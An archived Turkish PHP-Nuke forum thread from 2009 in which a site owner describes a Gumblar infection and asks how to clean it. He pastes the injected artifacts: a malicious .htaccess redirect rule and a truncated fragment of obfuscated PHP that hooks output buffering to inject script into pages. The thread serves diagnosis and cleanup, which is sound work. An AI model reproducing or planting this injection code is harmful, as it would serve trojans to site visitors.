BU SİTE PHP-NUKE SONLANINCA KAPANDI. İÇİNDE EMEK OLDUĞUNDAN AÇIK TUTULMAKTADIR.
GÜNCEL İÇERİK BLOG SAYFASINDADIR!
Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 5426
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Nuke sentinelin sorgulama..
(6337 okuma, 0 yanıt)
 dizin CHMOD ları değişmiy..
(10458 okuma, 6 yanıt)
 3.3Patch Hakkında Versiyo..
(4513 okuma, 0 yanıt)
 nuke sentinel 2.6.01 kura..
(12748 okuma, 10 yanıt)
 Nuke Sentinel..
(5749 okuma, 2 yanıt)
 Nuke 8.0 Guvenlik..
(6328 okuma, 2 yanıt)
 Php Nuke 8.0 Güvenlik asa..
(4568 okuma, 0 yanıt)
 php nuke 8 kurdum güvenli..
(13263 okuma, 10 yanıt)
 Arkadaslar Lütfen Yardımc..
(12166 okuma, 9 yanıt)
 Site hacklendi sanırım.....
(6834 okuma, 2 yanıt)
 Hadi Protector Kuralım..
(51597 okuma, 45 yanıt)
 Bu bir saldırmı..
(10753 okuma, 7 yanıt)
 siteme virüs girmis..
(11746 okuma, 6 yanıt)
 Sitedekileri atmak..
(6901 okuma, 2 yanıt)
 Kötü botları engellemek...
(14621 okuma, 10 yanıt)
 2 dakika içinde 5 farklı ..
(9206 okuma, 5 yanıt)
 index atılamayan site yap..
(9225 okuma, 5 yanıt)
 Sanal Klavye Uygulamasi H..
(6948 okuma, 2 yanıt)
 js trojandownloader.agent..
(7404 okuma, 4 yanıt)
 Güvenlik konusunda yardım..
(9915 okuma, 8 yanıt)
 Sunucu firması websiteme ..
(6528 okuma, 2 yanıt)
 siteme saldirimi olmus?..
(7840 okuma, 4 yanıt)
 Protector bir işe yaramıy..
(18978 okuma, 15 yanıt)
 Nuke Sentinel 242 pl5 ( 7..
(33241 okuma, 25 yanıt)
 hacklendim mi?..
(7811 okuma, 4 yanıt)
 Güvenli prefix değiştirme..
(96277 okuma, 108 yanıt)
 7.6 ya 3.2 pack nasıl yap..
(5755 okuma, 1 yanıt)
 Site neden Google i banla..
(5364 okuma, 1 yanıt)
 PhpMyadminden toplu isim ..
(8174 okuma, 4 yanıt)
 sentinel güvenlik sistemi..
(9420 okuma, 6 yanıt)
 Sitemdeki Bu Acik Neyden ..
(9587 okuma, 6 yanıt)
 Saldırı yedim BW dolmuş. ..
(12947 okuma, 9 yanıt)
 sürümünüz < 7.8 ise s..
(9017 okuma, 5 yanıt)
 forum için kod yazma yasa..
(6458 okuma, 2 yanıt)
 Arkadaşlar hacklendim seb..
(6025 okuma, 2 yanıt)
 KENDİ TOLBARIMIMDAN AYDA ..
(6947 okuma, 3 yanıt)
 Bütün indexler değişmiş, ..
(6405 okuma, 3 yanıt)
 Çok sorulu, çok şıklı ank..
(4345 okuma, 0 yanıt)
 Protector' deki Host İs..
(4390 okuma, 0 yanıt)
 php nuke dosyaları şifrel..
(9681 okuma, 7 yanıt)
 index dosyasının chmod k..
(5254 okuma, 1 yanıt)
 AdminBox-1.0.3 Kurulumund..
(4615 okuma, 0 yanıt)
 gec saatlerde hızlanan tr..
(10245 okuma, 8 yanıt)
 Prefix değiştirmede coppe..
(5812 okuma, 1 yanıt)
 Nuke Güvenlik..
(200756 okuma, 257 yanıt)
 bütün index lere iframe e..
(24824 okuma, 24 yanıt)
 Nuke Sentinel Google bot ..
(7479 okuma, 4 yanıt)
 Siteme Sürekli Üye Oluyor..
(31540 okuma, 28 yanıt)
 Yeni iframe virüsler kodl..
(24738 okuma, 23 yanıt)
 Nuke Versiyonları Hakkın..
(4873 okuma, 0 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - Sİtenize virüs bulaşabilir!..
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


Sİtenize virüs bulaşabilir!..

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
karabey15
Mesaj: 1+
Mesaj: 1+





Kayıt: Mar 29, 2008
Mesajlar: 35

MesajTarih: 2009-06-01, 02:11:26    Mesaj konusu: Sİtenize virüs bulaşabilir!.. Alıntıyla Cevap Gönder

Siteme Gumblar adında bir virüs bulaştı. Tüm dosyaların içine bir kod atıyor ve siteyi müthiş yavaşlatıyor. Giren herkesin bilgisayarına da trojan atıyor. Nod32 bulmuyor bile, sadece kaspersky bulup siliyor bilgisayardan. Siteden ise tüm dosyaları tek tek temizleyerek kurtulabiliyorsunuz.

Eğer doğru teşhis edebilmişsem (ki ustalar daha iyi bilir) .htaccess içine şu kodları atıyor;
Kod:
RewriteEngine on
Options All
RewriteCond %{HTTP_HOST} ^.*$
RewriteRule ^index\.htm$ "http\:\/\/readme\.txt" [R=302


html dosyalarına da;
Kod:
<s><function></s>

bunu atıyor.

php dosyalarına ise;

Kod:
</s>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<s><n></s>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count>


Tecrübemi paylaşmak istedim. Vede tek tek dosya temizlemeden toplu halde bu illetden kurtulmanın yolunu bilen varsa YARDIM bekliyorum. Çoook sevinirim.

KODLARI NETOPSİYON KIRPIYOR; KISACA
html içine jawascript atıyor.
php ye de karmakarışık bir kodla birlikte gene jawa atıyor.

Birde sanırım artık phpnuke den caymaya başladım. Phpfusion a mı geçsek.

..
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2026-06-24, 00:43:24    Mesaj konusu: Forum Arası Reklamlar

Başa dön
artistbaron
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Dec 09, 2006
Mesajlar: 2993

MesajTarih: 2009-06-01, 04:03:39    Mesaj konusu: Alıntıyla Cevap Gönder

İframe virüs için birde buraya bakabilirsiniz.

http://www.saho.in/sitenize-i f r a m e-virusu-bulasirsa-temizlemeniz-icin-script/

İşe yarayabilir.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
karabey15
Mesaj: 1+
Mesaj: 1+





Kayıt: Mar 29, 2008
Mesajlar: 35

MesajTarih: 2009-06-01, 11:21:58    Mesaj konusu: Alıntıyla Cevap Gönder

artistbaron sağolasın. Denedim şimdi o linki. Ama hata veriyor; line 7 diyor.

Aslında script nasıl kullanılır onu bilmiyorum. Bu kodları tmz.php olarak kaydettim ana dizine attım ve çalıştırmayı denedim. Ama olmadı.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok Virüs ahmetx Php Nuke Sorunlarınız 1 2010-07-21, 11:52:37 Son Mesajı Görüntüle
Yeni mesaj yok siteme virüs girmis atakanxx Php Nuke Güvenlik 6 2010-02-16, 07:20:28 Son Mesajı Görüntüle
Yeni mesaj yok Yine virüs Girer mi ? denizcifcii Php Nuke Sorunlarınız 9 2009-09-16, 02:30:46 Son Mesajı Görüntüle
Yeni mesaj yok IFRAME Virüs Nasıl Bulaşır? denizcifcii Php Nuke Sorunlarınız 3 2009-09-14, 15:00:47 Son Mesajı Görüntüle
Yeni mesaj yok Bu Nedir Arkadaşlar Fikri Olan Var mı... KaRNeC_81 Php Nuke Sorunlarınız 2 2009-08-21, 15:20:47 Son Mesajı Görüntüle

Copyright © 2002-2026 Ali Osman KAHRAMAN - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
netopsiyon®, Ali Osman KAHRAMAN' a ait tescilli bir markadır. İzinsiz kullanılamaz!
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright